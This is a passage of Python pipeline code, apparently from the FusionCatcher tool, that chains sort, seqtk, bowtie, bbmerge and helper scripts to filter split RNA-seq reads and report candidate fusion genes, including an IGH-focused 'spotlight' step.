            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        # job.add('|',kind='parameter')
        # job.add('LC_ALL=C',kind='parameter')
        # job.add('uniq',kind='parameter')
        job.add('|',kind='parameter')
        job.add(_SK_+'seqtk',kind='parameter')
        job.add('subseq',kind='parameter')
        job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input',temp_path=temp_flag)
        job.add('-',kind='parameter')
        job.add('>',outdir('reads-ids_clip_bowtie2_psl.fq'),kind='output')
        job.run()
        job.add(_FC_+'split-reads.py',kind='program')
        job.add('--input',outdir('reads-ids_clip_bowtie2_psl.fq'),kind='input',temp_path=temp_flag)
        job.add('--list',outdir('reads-ids_clip_bowtie2_psl_uniq.txt'),kind='input',temp_path=temp_flag)
        job.add('--output-1',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='output')
        job.add('--output-2',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='output')
        job.add('--wiggle-size',options.rescue_wiggle_size,kind='parameter')
        job.add('--gap-size',options.rescue_gap_size,kind='parameter')
        job.add('--anchor-size',length_anchor_minimum,kind='parameter')
        job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no')
        job.run(error_message = ("If this fails due to a memory error then lowering the "+
                                 "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+
                                 "of FusionCatcher and running it again might help!"))
        job.add('LC_ALL=C',kind='program')
        job.add('sort',kind='parameter')
        job.add('-u',kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        job.add('',outdir('reads-refs_clip_psl_bowtie2.txt'),kind='input',temp_path=temp_flag)
        # job.add('|',kind='parameter')
        # job.add('LC_ALL=C',kind='parameter')
        # job.add('uniq',kind='parameter')
        job.add('>',outdir('reads-refs_clip_bowtie2_psl_uniq.txt'),kind='output')
        job.run()
        # some pre-filtering of splitting reads (filter out the split reads which map on one gene)
        job.add('LC_ALL=C',kind='program')
        job.add('cat',kind='parameter')
        job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq.txt'),kind='input')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('tr',kind='parameter')
        job.add('"|"',kind='parameter')
        job.add('"\\t"',kind='parameter')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('cut',kind='parameter')
        job.add('-f',"1,2",kind='parameter')
        job.add('|',kind='parameter')
        job.add('tr',kind='parameter')
        job.add('"\\t"',kind='parameter')
        job.add('"\\n"',kind='parameter')
        job.add('|',kind='parameter')
        job.add('sort',kind='parameter')
        job.add('-u',kind='parameter') # unique
        job.add('|',kind='parameter')
        job.add('sed',kind='parameter')
        job.add("'1{/^$/d}'",kind='parameter') # delete the first line if it is empty (i.e. it contains only a newline)
        job.add('>',outdir('reads-refs_clip_bowtie2_psl_uniq_more.txt'),kind='output')
        job.run()
        job.add(_SK_+'seqtk',kind='program')
        job.add('subseq',kind='parameter')
        job.add('',outdir('gene-gene_unique.fa'),kind='input')
        job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq_more.txt'),kind='input',temp_path=temp_flag)
        job.add('>',outdir('gene-gene-bowtie_bowtie2_unique.fa'),kind='output')
        job.run()
        job.add(_BE_+'bowtie-build',kind='program')
        if bowtie121:
            job.add('--threads',options.processes,kind='parameter')
        job.add('-f',kind='parameter')
        job.add('--quiet',kind='parameter')
        # job.add('--ntoa',kind='parameter')
        job.add('--offrate','1',kind='parameter')
        job.add('--ftabchars','5',kind='parameter')
        #job.add('',outdir('gene-gene.fa'),kind='input')
        job.add('',outdir('gene-gene-bowtie_bowtie2_unique.fa'),kind='input',temp_path=temp_flag)
        job.add('',outdir('gene-gene-bowtie_bowtie2_unique/'),kind='output',checksum='no')
        job.add('',outdir('gene-gene-bowtie_bowtie2_unique/'),kind='output',command_line='no')
        job.run()
        # map using bowtie
        # filter out reads not mapping
        ms = min(options.mismatches,2)
        if options.skip_fastqtk:
            job.add(_SK_+'seqtk',kind='program')
            job.add('mergepe',kind='parameter')
            job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input')
            job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input')
        else:
            job.add(_FK_+'fastqtk',kind='program')
            job.add('interleave',kind='parameter')
            job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input')
            job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input')
            job.add('-',kind='parameter')
        job.add('|',kind='parameter')
        job.add(_FC_+'sliding-read.py',kind='parameter')
        job.add('--window','33',kind='parameter')
        job.add('--step','15',kind='parameter')
        job.add('-i','-',kind='parameter')
        job.add('-o','-',kind='parameter')
        job.add('|',kind='parameter')
        job.add(_BE_+'bowtie',kind='parameter')
        job.add('--seed',bowtie_seed,kind='parameter')
        job.add('-t',kind='parameter')
        job.add('-k','1',kind='parameter')
        job.add('-v',ms,kind='parameter')
        job.add('-p',options.processes,kind='parameter',checksum='no')
        # job.add('--trim5','10',kind='parameter')
        # job.add('--trim3','10',kind='parameter')
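        # sliding-read.py (above) re-cuts each read into overlapping 33-bp
        # windows every 15 bp; a read survives this pre-filter only when two
        # adjacent windows of it both map, which is what the a/b pairing awk
        # below enforces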
        job.add('--tryhard',kind='parameter')
        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
        job.add('--suppress','2,3,4,5,6,7,8',kind='parameter')
        if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_bowtie2_unique'),'.1.ebwtl')):
            job.add('--large-index',kind='parameter')
        job.add('',outdir('gene-gene-bowtie_bowtie2_unique/'),kind='input')
        job.add('-',kind='parameter')
        job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2-temp.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag)
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('uniq',kind='parameter')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('sort',kind='parameter')
        job.add('-u',kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        job.add('|',kind='parameter')
        job.add('awk',kind='parameter')
        job.add('',"""'{n=length($0); if (olde=="a" && substr($0,0,n-1)==old && substr($0,n,1)=="b") {print old"a\\n"$0; old="";} {old=substr($0,0,n-1); olde=substr($0,n,1);}}'""",kind='parameter')
        job.add('>',outdir('reads_filtered_unique_cuts_bowtie2.txt'),kind='output')
        job.run()
        job.add(_SK_+'seqtk',kind='program')
        job.add('subseq',kind='parameter')
        job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input')
        job.add('',outdir('reads_filtered_unique_cuts_bowtie2.txt'),kind='input')
        job.add('>',outdir('reads-ids_clip_bowtie2_psl_r1r1.fq'),kind='output')
        job.run()
        job.add(_SK_+'seqtk',kind='program')
        job.add('subseq',kind='parameter')
        job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input')
        job.add('',outdir('reads_filtered_unique_cuts_bowtie2.txt'),kind='input',temp_path=temp_flag)
        job.add('>',outdir('reads-ids_clip_bowtie2_psl_r2r2.fq'),kind='output')
        job.run()
        # this is for the case when the output of the previous command is empty (then it takes the first read)
        if job.iff(empty(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq')),id = "##reads-ids_clip_bowtie2_psl_r1r1.fq##"):
            job.add('head',kind='program')
            job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input')
            job.add('>',outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq'),kind='output')
            job.run()
            job.add('head',kind='program')
            job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input')
            job.add('>',outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq'),kind='output')
            job.run()
            job.clean(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq'),temp_path=temp_flag)
            job.clean(outdir('reads-ids_clip_bowtie2_psl_r2r2.fq'),temp_path=temp_flag)
        else:
            job.link(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq'), outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq'), temp_path=temp_flag)
            job.link(outdir('reads-ids_clip_bowtie2_psl_r2r2.fq'), outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq'), temp_path=temp_flag)
        # map using bowtie
        ms = min(options.mismatches,2)
        job.add(_BE_+'bowtie',kind='program')
        job.add('--seed',bowtie_seed,kind='parameter')
        job.add('-t',kind='parameter')
        job.add('-k','1',kind='parameter')
        job.add('-v',ms,kind='parameter')
        job.add('-p',options.processes,kind='parameter',checksum='no')
        job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes")
        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
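        # '--ff' below: the two rescue mates are the two halves of one original
        # read, cut out in the same (forward) orientation by split-reads.py, so
        # a forward/forward pair is expected instead of bowtie's default 'fr'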
        job.add('--ff',kind='parameter')
        job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered.fq'),kind='output',checksum='no') # unmapped reads
        job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq'),kind='output',command_line='no') # unmapped reads
        job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2.fq'),kind='output',command_line='no') # unmapped reads
        job.add('--max',outdir('reads-ids_clip_bowtie2_psl_max_filtered.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un'
        if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_bowtie2_unique'),'.1.ebwtl')):
            job.add('--large-index',kind='parameter')
        job.add('',outdir('gene-gene-bowtie_bowtie2_unique/'),kind='input',temp_path=temp_flag)
        job.add('-1',outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq'),kind='input',temp_path=temp_flag)
        job.add('-2',outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq'),kind='input',temp_path=temp_flag)
        job.add('',outdir('split_gene-gene_bowtie2_filtered.sam'),kind='output',temp_path=temp_flag)
        job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag)
        job.run()
        # this is for the case when the output of the previous command is empty (then it takes the first read)
        if job.iff(empty(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq')),id = "##reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq##"):
            job.add('head',kind='program')
            job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input',temp_path=temp_flag)
            job.add('>',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1_t.fq'),kind='output')
            job.run()
            job.add('head',kind='program')
            job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input',temp_path=temp_flag)
            job.add('>',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2_t.fq'),kind='output')
            job.run()
            job.clean(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq'),temp_path=temp_flag)
            job.clean(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2.fq'),temp_path=temp_flag)
        else:
            job.link(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq'), outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1_t.fq'), temp_path=temp_flag)
            job.link(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2.fq'), outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2_t.fq'), temp_path=temp_flag)
            job.clean(outdir('reads-ids_clip_bowtie2_psl_r1.fq'),temp_path=temp_flag)
            job.clean(outdir('reads-ids_clip_bowtie2_psl_r2.fq'),temp_path=temp_flag)
        job.add(_SK_+'seqtk',kind='program')
        job.add('subseq',kind='parameter')
        job.add('',outdir('gene-gene.fa'),kind='input')
        job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq.txt'),kind='input',temp_path=temp_flag)
        job.add('>',outdir('gene-gene-bowtie_bowtie2.fa'),kind='output')
        job.run()
        job.add(_BE_+'bowtie-build',kind='program')
        if bowtie121:
            job.add('--threads',options.processes,kind='parameter')
        job.add('-f',kind='parameter')
        job.add('--quiet',kind='parameter')
        # job.add('--ntoa',kind='parameter')
        job.add('--offrate','1',kind='parameter')
        job.add('--ftabchars','5',kind='parameter')
        job.add('',outdir('gene-gene-bowtie_bowtie2.fa'),kind='input',temp_path=temp_flag)
        job.add('',outdir('gene-gene-bowtie_bowtie2/'),kind='output',checksum='no')
        job.add('',outdir('gene-gene-bowtie_bowtie2/'),kind='output',command_line='no')
        job.run()
        # map using bowtie
        job.add(_BE_+'bowtie',kind='program')
        job.add('--seed',bowtie_seed,kind='parameter')
        if bowtie121:
            job.add('--no-unal',kind='parameter')
        job.add('-t',kind='parameter')
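        # up to 500 alignments per pair are reported ('-k 500' below), while
        # '--best --strata' keeps only the top stratum, so reads hitting several
        # homologous junctions are retained without an unbounded blow-up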
        #job.add('-q',kind='parameter')
        #job.add('-a',kind='parameter')
        job.add('-k','500',kind='parameter')
        job.add('-v',options.mismatches,kind='parameter')
        job.add('-p',options.processes,kind='parameter',checksum='no')
        if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_bowtie2'),'.1.ebwtl')):
            job.add('--large-index',kind='parameter')
        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
        if options.ff_tryhard:
            job.add('--tryhard',kind='parameter')
        job.add('--best',kind='parameter')
        job.add('--strata',kind='parameter')
        job.add('--sam',kind='parameter')
        job.add('--ff',kind='parameter')
        job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes")
        job.add('',outdir('gene-gene-bowtie_bowtie2/'),kind='input',temp_path=temp_flag)
        job.add('-1',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1_t.fq'),kind='input',temp_path=temp_flag)
        job.add('-2',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2_t.fq'),kind='input',temp_path=temp_flag)
        if bowtie121:
            job.add('',outdir('split_gene-gene_bowtie2.sam'),kind='output')
            job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag)
        else:
            job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag)
            job.add('|',kind='parameter')
            job.add('LC_ALL=C',kind='parameter')
            job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter')
            job.add('>',outdir('split_gene-gene_bowtie2.sam'),kind='output')
        job.run()
        job.add(_FC_+'merge-sam.py',kind='program')
        job.add('--input',outdir('split_gene-gene_bowtie2.sam'),kind='input',temp_path=temp_flag)
        job.add('--output',outdir('split_gene-gene_bowtie2_patch.sam'),kind='output')
        job.run()
        job.add(_FC_+'sam2psl.py',kind='program')
        job.add('--input',outdir('split_gene-gene_bowtie2_patch.sam'),kind='input',temp_path=temp_flag)
        #job.add('--output',outdir('split_gene-gene_bowtie2_patch.psl'),kind='output')
        job.add('--output','-',kind='parameter')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('sort',kind='parameter')
        job.add('-k','10,10',kind='parameter')
        job.add('-k','14,14',kind='parameter')
        job.add('-k','12,12n',kind='parameter')
        job.add('-k','13,13n',kind='parameter')
        job.add('-t',"'\t'",kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        job.add('>',outdir('split_gene-gene_bowtie2_patch.psl'),kind='output')
        job.run()
        job.add(_FC_+'analyze_splits_sam.py',kind='program')
        job.add('--input',outdir('split_gene-gene_bowtie2_patch.psl'),kind='input',temp_path=temp_flag)
        job.add('--output',outdir('split_gene-gene_bowtie2_final.psl'),kind='output')
        job.add('--remove-extra',kind='parameter')
        job.run()
        if job.iff(empty(outdir('split_gene-gene_bowtie2_final.psl')),id = "#split_gene-gene_bowtie2_final#"):
            job.link(outdir('gene-gene-bowtie2_final.psl'), outdir('gene-gene-bowtie2_final_more.psl'), temp_path=temp_flag)
            job.clean(outdir('split_gene-gene_bowtie2_final.psl'),temp_path=temp_flag)
        else:
            job.add('cat',kind='program')
            job.add('',outdir('split_gene-gene_bowtie2_final.psl'),kind='input',temp_path=temp_flag)
            job.add('',outdir('gene-gene-bowtie2_final.psl'),kind='input',temp_path=temp_flag)
            job.add('>',outdir('gene-gene-bowtie2_final_more.psl'),kind='output')
            job.run()
# find the best unique alignments of reads
job.add(_FC_+'psl_best_unique_contigs.py',kind='program')
job.add('--input',outdir('gene-gene-bowtie2_final_more.psl'),kind='input',temp_path=temp_flag)
job.add('--output',outdir('gene-gene-bowtie2_best-unique.psl'),kind='output')
# if (not empty(outdir('candidate_fusion-genes_further_mark.txt'))) and (not empty(datadir('custom_genes.txt'))):
#     job.add('--ties',datadir('custom_genes_mark.txt'),kind='output')
if sort_buffer:
    job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
job.add('--ties-overlappings',datadir('ensembl_overlapping_genes.txt'),kind='input')
job.add('--anchor',length_anchor_bowtie2,kind='parameter') # find_fusion_genes_blat.py --threshold_overlap is enough!
job.add('--mismatches',options.mismatches_psl,kind='parameter')
job.add('--processes',options.processes,kind='parameter',checksum='no')
job.add('--tmp_dir',tmp_dir,kind='output',checksum='no')
job.run()
# more filtering -- remove the reads from the gene-gene junctions
# which have the pair read mapping on a totally different gene than
# those involved in the gene-gene junction
if not options.all_reads_junction:
    job.add(_FC_+'remove_reads_exon_exon_psl.py',kind='program')
    job.add('--input_psl',outdir('gene-gene-bowtie2_best-unique.psl'),kind='input',temp_path=temp_flag)
    job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='input',temp_path=temp_flag)
    job.add('--output_psl',outdir('gene-gene-bowtie2_best-unique_gene_pairs.psl'),kind='output')
    job.run()
else:
    job.link(outdir('gene-gene-bowtie2_best-unique.psl'), outdir('gene-gene-bowtie2_best-unique_gene_pairs.psl'), temp_path=temp_flag)
job.add(_FC_+'find_fusion_genes_psl.py',kind='program')
job.add('--input_mappings',outdir('gene-gene-bowtie2_best-unique_gene_pairs.psl'),kind='input',temp_path=temp_flag)
job.add('--input_genegene_fasta',outdir('gene-gene.fa'),kind='input',temp_path=temp_flag)
job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input')
job.add('--input_genes_positions',datadir('genes.txt'),kind='input')
job.add('--threshold_overlap',length_anchor_bowtie2,kind='parameter')
job.add('--mismatches',options.mismatches_psl,kind='parameter')
job.add('--output',outdir('candidates_fusion_genes_reads_bowtie2_7.txt'),kind='output')
job.run()
job.add(_FC_+'smoothing_fusions_psl.py',kind='program')
job.add('--input',outdir('candidates_fusion_genes_reads_bowtie2_7.txt'),kind='input',temp_path=temp_flag)
job.add('--output',outdir('candidates_fusion_genes_reads_bowtie2.txt'),kind='output')
job.add('--wiggle','3',kind='parameter')
job.run()
# summarize the gene-gene mappings
job.add(_FC_+'build_report_fusions_psl.py',kind='program')
job.add('--suporting_unique_reads',spanning_reads_bowtie2,kind='parameter')
job.add('--anchor2',length_anchor2,kind='parameter')
job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input',temp_path=temp_flag if options.skip_spotlight else 'no')
job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag if options.skip_spotlight else 'no')
job.add('--input_fusion_psl',outdir('candidates_fusion_genes_reads_bowtie2.txt'),kind='input',temp_path=temp_flag)
job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no')
if options.psl_visualization and not empty(datadir('genome.2bit')):
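    # the BLAT-style web alignments need the 2bit-packed genome; this block is
    # skipped when genome.2bit was not generated for the current build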
    job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input')
    job.add('--psl_alignment_type','web',kind='parameter')
    if _BT_:
        job.add('--blat-dir',_BT_,kind='parameter')
if options.sam_visualization:
    job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input')
    job.add('--sam_alignment','20',kind='parameter')
    job.add('--threads',options.processes,kind='parameter')
    if _B2_:
        job.add('--bowtie2-dir',_B2_,kind='parameter')
if options.assembly:
    job.add('--velvet',kind='parameter')
    if _VT_:
        job.add('--velvet-dir',_VT_,kind='parameter')
job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE2.txt'),kind='output')
job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE2.zip'),kind='output')
job.run()

##################################################################################
# Find fusion genes using SPOTLIGHT method used for now with IGH only???
##################################################################################
if not options.skip_spotlight:
    if job.iff(eporcrlf2igh and (not empty(outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'))),id = "####focus-candidate_fusion-genes_further_eporcrlf2igh###"):
        ###
        job.add('prep-1by1.py',kind='program')
        job.add('-i',outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'),kind='input') # outdir('candidate_fusion-genes_further.txt')
        job.add('-r',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input')
        job.add('-1',outdir('candidate_focus_genes.txt'),kind='output')
        job.add('-2',outdir('candidate_focus_reads.txt'),kind='output')
        job.run()
        job.add(_FC_+'concatenate.py',kind='program')
        job.add('-f',outdir('candidate_focus_reads.txt'),kind='input')
        job.add('',outdir('candidate_focus_all_reads.txt'),kind='output')
        job.run()
        if job.iff(not empty(outdir('original_important.fq.gz')),id="##focus-original_important##"):
            job.add(_SK_+'seqtk',kind='program')
            job.add('subseq',kind='parameter')
            job.add('',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag)
            job.add('',outdir('candidate_focus_all_reads.txt'),kind='input',temp_path=temp_flag)
            job.add('>',outdir('focus.fq'),kind='output')
            job.run()
        elif job.iff(not empty(outdir('originala.fq.gz')),id="##focus-originala##"):
            job.add(_SK_+'seqtk',kind='program')
            job.add('subseq',kind='parameter')
            job.add('',outdir('originala.fq.gz'),kind='input',temp_path=temp_flag)
            job.add('',outdir('candidate_focus_all_reads.txt'),kind='input',temp_path=temp_flag)
            job.add('>',outdir('focus.fq'),kind='output')
            job.run()
        else:
            t = ["ERROR: '%s' and '%s' not found!" % (outdir('original_important.fq.gz'),outdir('originala.fq.gz'))]
            job.write(t, stderr=True)
            sys.exit(1)
        fgenes = []
        if not empty(outdir('candidate_focus_genes.txt')):
            fgenes = [el.rstrip() for el in file(outdir('candidate_focus_genes.txt'),'r') if el.rstrip()]
        freads = []
        if not empty(outdir('candidate_focus_reads.txt')):
            freads = [el.rstrip() for el in file(outdir('candidate_focus_reads.txt'),'r') if el.rstrip()]
        for i in range(len(fgenes)):
            job.add(_SK_+'seqtk',kind='program')
            job.add('subseq',kind='parameter')
            job.add('',outdir('focus.fq'),kind='input')
            job.add('',freads[i],kind='input',temp_path=temp_flag)
            job.add('>',freads[i]+'.fq',kind='output')
            job.run()
            ## DEBUG
            #temp_flag = 'no'
            if options.skip_bbmerge:
                job.add(_FC_+'merge-reads.py',kind='program')
                job.add('-1',freads[i]+'.fq',kind='input',temp_path=temp_flag)
                job.add('-m',freads[i]+'_m.fq',kind='output')
                job.add('--overlap','11',kind='parameter')
                job.add('-p',options.processes,kind='parameter',checksum='no')
                job.run()
            elif options.skip_bbmerge_auto:
                job.add(_BP_+'bbmerge.sh',kind='program')
                job.add('in=',freads[i]+'.fq',kind='input',space='no',temp_path=temp_flag)
                job.add('out=',freads[i]+'_m.fq',kind='output',space='no')
                job.add('threads=',options.processes,kind='parameter',space='no')
                job.add('strict=','f',kind='parameter',space='no')
                job.add('minoverlap=','11',kind='parameter',space='no')
                job.add('-Xmx',options.xmx,kind='parameter',checksum='no',space='no')
                job.run()
            else:
                job.add(_BP_+'bbmerge-auto.sh',kind='program')
                job.add('in=',freads[i]+'.fq',kind='input',space='no',temp_path=temp_flag)
                job.add('out=',freads[i]+'_m.fq',kind='output',space='no')
                job.add('threads=',options.processes,kind='parameter',space='no')
                job.add('extend2=','20',kind='parameter',space='no')
                job.add('iterations=','3',kind='parameter',space='no')
                job.add('k=','17',kind='parameter',space='no')
                job.add('mindepthseed=','1',kind='parameter',space='no')
                job.add('mindepthextend=','1',kind='parameter',space='no')
                job.add('minoverlap=','11',kind='parameter',space='no')
                job.add('-Xmx',options.xmx,kind='parameter',checksum='no',space='no')
                job.run()
            job.add(_SK_+'seqtk',kind='program')
            job.add('seq',kind='parameter')
            job.add('-L',min_len_reads*2-4,kind='parameter')
            job.add('',freads[i]+'_m.fq',kind='input',temp_path=temp_flag)
            job.add('>',freads[i]+'_merg.fq',kind='output')
            job.run()
            # deduplicate
            job.add('LC_ALL=C',kind='program')
            job.add('cat',kind='parameter')
            job.add('',freads[i]+'_merg.fq',kind='input',temp_path=temp_flag)
            job.add('|',kind='parameter')
            job.add('LC_ALL=C',kind='parameter')
            job.add('paste','- - - -',kind='parameter')
            job.add('|',kind='parameter')
            job.add('LC_ALL=C',kind='parameter')
            job.add('sort',kind='parameter')
            job.add('-k','2,2',kind='parameter')
            job.add('-u',kind='parameter') # unique
            job.add('-t',"'\t'",kind='parameter')
            if sort_buffer:
                job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
            if sort_parallel:
                job.add('--parallel',options.processes,kind='parameter',checksum='no')
            if sort_lzop_compress:
                job.add('--compress-program','lzop',kind='parameter',checksum='no')
            elif sort_gzip_compress:
                job.add('--compress-program','gzip',kind='parameter',checksum='no')
            job.add('-T',tmp_dir,kind='parameter',checksum='no')
            job.add('|',kind='parameter')
            job.add('LC_ALL=C',kind='parameter')
            job.add('tr',kind='parameter')
            job.add('"\\t"',kind='parameter')
            job.add('"\\n"',kind='parameter')
            job.add('>',freads[i]+'_merged.fq',kind='output')
            job.run()
            job.add('LC_ALL=C',kind='program')
            job.add('cat',kind='parameter')
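            # count the merged reads: a FASTQ record is 4 lines, so
            # $((`wc -l`/4)) yields the number of reads; the count ('mc' below)
            # gates this candidate against spanning_reads_spotlight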
            job.add('',freads[i]+'_merged.fq',kind='input')
            job.add('|',kind='parameter')
            job.add("echo $((`wc -l`/4))",kind='parameter')
            job.add('>>',freads[i]+'_merged_count.txt',kind='output')
            job.run()
            mc = -1
            uf = freads[i]+'_merged_count.txt'
            if os.path.exists(uf):
                mc = int(float(file(uf,"r").readline().strip()))
            job.clean(uf,temp_path=temp_flag)
            fqm = freads[i]+'_merged.fq'
            if job.iff((not empty(fqm)) and (mc >= spanning_reads_spotlight), id = "#freads_"+str(i)+"_merged.fq#"):
                #####################################################################
                # VELVET stuff
                #####################################################################
                # job.add(_SK_+'seqtk',kind='program')
                # job.add('seq','-A',kind='parameter')
                # job.add('',freads[i]+'_merged.fq',kind='input')
                # job.add('>',freads[i]+'_merged.fa',kind='output')
                # job.run()
                # vel = fgenes[i]+"_velvet/"
                # job.add(_VT_+'velveth',kind='program')
                # job.add('',vel,kind='output')
                # job.add('','23',kind='parameter') # kmer
                # job.add('-short',kind='parameter')
                # job.add('',freads[i]+'_merged.fa',kind='output')
                # job.run()
                # job.add(_VT_+'velvetg',kind='program')
                # job.add('',vel,kind='output')
                # job.add('-cov_cutoff','2',kind='parameter')
                # job.add('-read_trkg','yes',kind='parameter')
                # job.run()
                # job.add(_OS_+'oases',kind='program')
                # job.add('',vel,kind='output')
                # job.add('-min_trans_lgth','100',kind='parameter')
                # job.add('-cov_cutoff','2',kind='parameter') # 2 reads minimum coverage
                # job.run()
                #####################################################################
                job.add(_FC_+'generate_gene-gene_junctions.py',kind='program')
                job.add('--input',fgenes[i],kind='input',temp_path=temp_flag)
                job.add('--input_database',datadir('genes.fa'),kind='input')
                job.add('--input_exons',datadir('exons.txt'),kind='input')
                job.add('--reverse',kind='parameter')
                job.add('--longest',outdir('genegene_longest.txt.'+str(i)),kind='output')
                job.add('--output',outdir('genegene.fa.'+str(i)),kind='output')
                job.run()
                ## DEBUG
                #temp_flag = 'no'
                use_bbmap = True
                use_star = False
                use_bowtie2 = False
                use_libssw = False
                use_bwa = False
                if use_bwa:
                    bd = outdir("focus_bwa.%d/" % (i,))
                    job.add(_BA_+'bwa',kind='program')
                    job.add('index',kind='parameter')
                    job.add('-p',bd,kind='output')
                    job.add('-p',bd+'.amb',kind='output',command_line='no')
                    job.add('',outdir('genegene.fa.'+str(i)),kind='input')
                    job.run()
                    job.add(_BA_+'bwa',kind='program')
                    job.add('mem',kind='parameter')
                    job.add('-O','2',kind='parameter') # original 6
                    job.add('-A','2',kind='parameter') # original 2
                    job.add('-E','1',kind='parameter') # original 1
                    job.add('-L','100',kind='parameter') # original 5
                    # job.add('-a',kind='parameter')
                    # job.add('-T','1',kind='parameter')
                    job.add('-t',options.processes,kind='parameter',checksum='no')
                    job.add('',bd,kind='input')
